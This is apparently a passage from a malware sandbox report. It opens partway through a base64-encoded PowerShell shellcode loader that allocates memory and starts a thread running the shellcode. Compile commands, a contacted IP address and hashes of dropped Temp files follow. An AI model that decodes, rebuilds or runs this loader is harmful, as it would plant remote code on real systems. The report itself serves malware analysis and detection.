QALAAwAHgANAA0ACwAMAB4ADAANQAsADAAeAA3ADQALAAwAHgANQBlACwAMAB4ADkANAAsADAAeAAwADEALAAwAHgAMABmACwAMAB4ADIAZAAsADAAeABhADYALAAwAHgAOABlACwAMAB4AGIAYgAsADAAeABiADkALAAwAHgAOABhACwAMAB4ADQANwAsADAAeAA2ADUALAAwAHgAMwBkACwAMAB4AGUAYwAsADAAeAA3AGQALAAwAHgAZAAxACwAMAB4AGQAMQAsADAAeAAxADMALAAwAHgANwBlACwAMAB4ADIAMQAsADAAeABmAGIALAAwAHgAZAA3ACwAMAB4ADIAYQAsADAAeAA3ADEALAAwAHgAOQAzACwAMAB4AGYAZQAsADAAeAA1ADIALAAwAHgAMQBhACwAMAB4ADYAMwAsADAAeABmAGUALAAwAHgAOAA2ACwAMAB4ADgAYwAsADAAeAAzADMALAAwAHgANQAwACwAMAB4ADcAOQAsADAAeAA2AGMALAAwAHgAZQA0ACwAMAB4ADEAMAAsADAAeAAyADkALAAwAHgAMAA0ACwAMAB4AGUAZQAsADAAeAA5AGUALAAwAHgAMQA2ACwAMAB4ADMANAAsADAAeAAxADEALAAwAHgANwA1ACwAMAB4ADMAZgAsADAAeAA1AGMALAAwAHgAZQA1ACwAMAB4ADcANgAsADAAeAA0ADAALAAwAHgAOQBjACwAMAB4ADgAZQAsADAAeAAxADMALAAwAHgAMwAzACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgAYgA5ACwAMAB4ADkAZAAsADAAeAA3ADMALAAwAHgAYgAzACwAMAB4ADIAYwAsADAAeABlADIALAAwAHgAMQBiACwAMAB4AGUAMgAsADAAeAA4ADcALAAwAHgAZAA2ACwAMAB4ADUAYgAsADAAeAAwAGIALAAwAHgAMAAyACwAMAB4ADkAZAAsADAAeAAxAGIALAAwAHgAZQA4ACwAMAB4AGMANwAsADAAeABhADgALAAwAHgAYwBiACwAMAB4ADcAOAAsADAAeAAxAGEALAAwAHgAYQBkACwAMAB4AGUAYgAsADAAeAAyADgALAAwAHgAOQAzACwAMAB4ADQAYgAsADAAeAA4ADEALAAwAHgAZAA4ACwAMAB4AGYANQAsADAAeABjADQALAAwAHgAMwBkACwAMAB4ADQAMAAsADAAeAA1AGMALAAwAHgAOQBlACwAMAB4AGQAYwAsADAAeAA4AGQALAAwAHgANABhACwAMAB4AGQAYQAsADAAeABkAGUALAAwAHgAMAA2ACwAMAB4ADcAOQAsADAAeAAxAGEALAAwAHgAOQAwACwAMAB4AGUAZQAsADAAeABmADQALAAwAHgAMAA4ACwAMAB4ADQANAAsADAAeAAxAGYALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeABjADIALAAwAHgAMgAwACwAMAB4ADcAOQAsADAAeAAxADkALAAwAHgAZQBhACwAMAB4AGIANAAsADAAeAA4ADYALAAwAHgAOAA4ACwAMAB4AGIAZAAsADAAeAAyADAALAAwAHgAOAA1ACwAMAB4AGUAZAAsADAAeAA4ADkALAAwAHgAZQBlACwAMAB4ADcANgAsADAAeABkADgALAAwAHgAOAAyACwAMAB4ADIANwAsADAAeABlADMALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeAA0ADcALAAwAHgAZQAzACwAMAB4ADIAMwAsADAAeABmAGMALAAwAHgAMQAxACwAMAB4ADYAOQAsADAAeAAyADQALAAwAHgAOQA0ACwAMAB4AGMANQAsADAAeABjADkALAAwAHgANwA3ACwAMAB4ADgAMQAsADAAeAAwADkALAAwAHgAYwA0ACwAMAB4AGUAYgAsADAAeAAxAGEALAAwAHgAOQBjACwAMAB4AGUANwAsADAAeAA1AGQALAAwAHgAYwBmACwAMAB4ADMANwAsADAAeAA4ADAALAAwAHgANgAzACwAMAB4ADMANgAsADAAeAA3AGYALAAwAHgAMABmACwAMAB4ADkAYgAsADAAeAAxAGQALAAwAHgAOAAxACwAMAB4ADcAMwAsADAAeAA0AGEALAAwAHgANQBiACwAMAB4AGYANwAsADAAeAA5AGQALAAwAHgANABlADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABGAGUAUwBOAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABGAGUAUwBOAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABGAGUAUwBOACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnlr-kac.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38DD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC38DC.tmp"

Network

Country Destination Domain Proto
US 8.8.8.8:53 testme.com udp
TW 192.72.98.5:80 tcp

Files

memory/1708-0-0x0000000000400000-0x0000000000476000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b6871bb612b0350b771280f6c95b4902
SHA1 68281830cae5ee715ba3d85f46c67db1621f5dcb
SHA256 f5e80d286d077ea62a999e9395b5eb49a3b4fe519100b5db8e2a647b75dabc70
SHA512 096393da0d01cb09e77f196fef9769f1bc7f4618e4c2dfccc7e634e57939df08abb01e04340a99faac7e0b14dd9fa949d54c3a63079c6120aefe59be9fd8e010

\??\c:\Users\Admin\AppData\Local\Temp\gnlr-kac.cmdline

MD5 ac79210adb489947c774aa90662ba787
SHA1 90c90291919bcceb605acc62c9319d720580cac4
SHA256 83ebaec4c4d3cdc7e55736c5958dbec7aeb4da365a4d96a29564d83f55290afb
SHA512 e304e7afaccdd35510a1636403a64832e164072aa2938650e97c9c70189d13ae7245f8f12e736d5fe59e63bf58d69bb8aeb2f2c00a24d173011029e83c2355bb

\??\c:\Users\Admin\AppData\Local\Temp\gnlr-kac.0.cs

MD5 7319070c34daa5f6f2ece2dfc07119ee
SHA1 f26a4a48518a5608e93c8b77368f588b0433973c
SHA256 b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
SHA512 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

\??\c:\Users\Admin\AppData\Local\Temp\CSC38DC.tmp

MD5 f80729650f8f0526c3c5e6c891efee75
SHA1 656d8a58d3bf4ad9298f3bc74097a890dc0bf43e
SHA256 49f6513126f0a42d8152ccf1e58b62c35bcd5c11e6cb58fc07fd8075d4ec1467
SHA512 75df3c9dcf5895b49092d61de08ecb938961407dc347df86ba05f4b5d43c0223f0c16ad050871d2e6891a1a67b1f551b2e93c0fe8bc47e556af1ef2b7ec2cfac

C:\Users\Admin\AppData\Local\Temp\RES38DD.tmp

MD5 bc429cab527bdae7fea6482775b95391
SHA1 3baab5115b94f7d9c065440200464e6af2a84f91
SHA256 5d0162a806205e8661c9fd72a99c3b48af55c0db129c2533cb968daeb9a7948a
SHA512 73bff415e35c1bb42b02897a5ee983922fb66f103e53c381cf3874bf088a35b5a29ad772a297fda4b25453f2025888b89f5fb21645c2d3bc26a05417b00c54fb

C:\Users\Admin\AppData\Local\Temp\gnlr-kac.dll

MD5 8ae45b56a4d40070bff2a57010ca829f
SHA1 07924b4f6fb54b3105d3dfb429bf482cd6609e5a
SHA256 47d84ae418a90f4120511e78492b0477f1085fc18b7419c63edccaec5ce9625a
SHA512 159033634a196cda3df156cc11b52b633610b2a5b2cb753a18728485972afaa6a05ff2c9383112e001ae8cdb9d8ff0fa3282bb44308134f8baaf812dc21a3170

C:\Users\Admin\AppData\Local\Temp\gnlr-kac.pdb

MD5 80deabb48aef123c006aebcafef01f8d
SHA1 ec14a45d86c617b7cb8974c467205265c35d462f
SHA256 e0cf193162ff37f68e42fdc67ef7eac0ab7f1741ee42d308dafd4f1bda33ecad
SHA512 6702e163435ee4561c9c32a4c52be897ab3f0db59659f24bc9fb06d222757c3f14f0e3f3f61be77078a0bdc7270aed7450459794a68d13b89e1dfb8826230dff

memory/2700-28-0x0000000005540000-0x0000000005541000-memory.dmp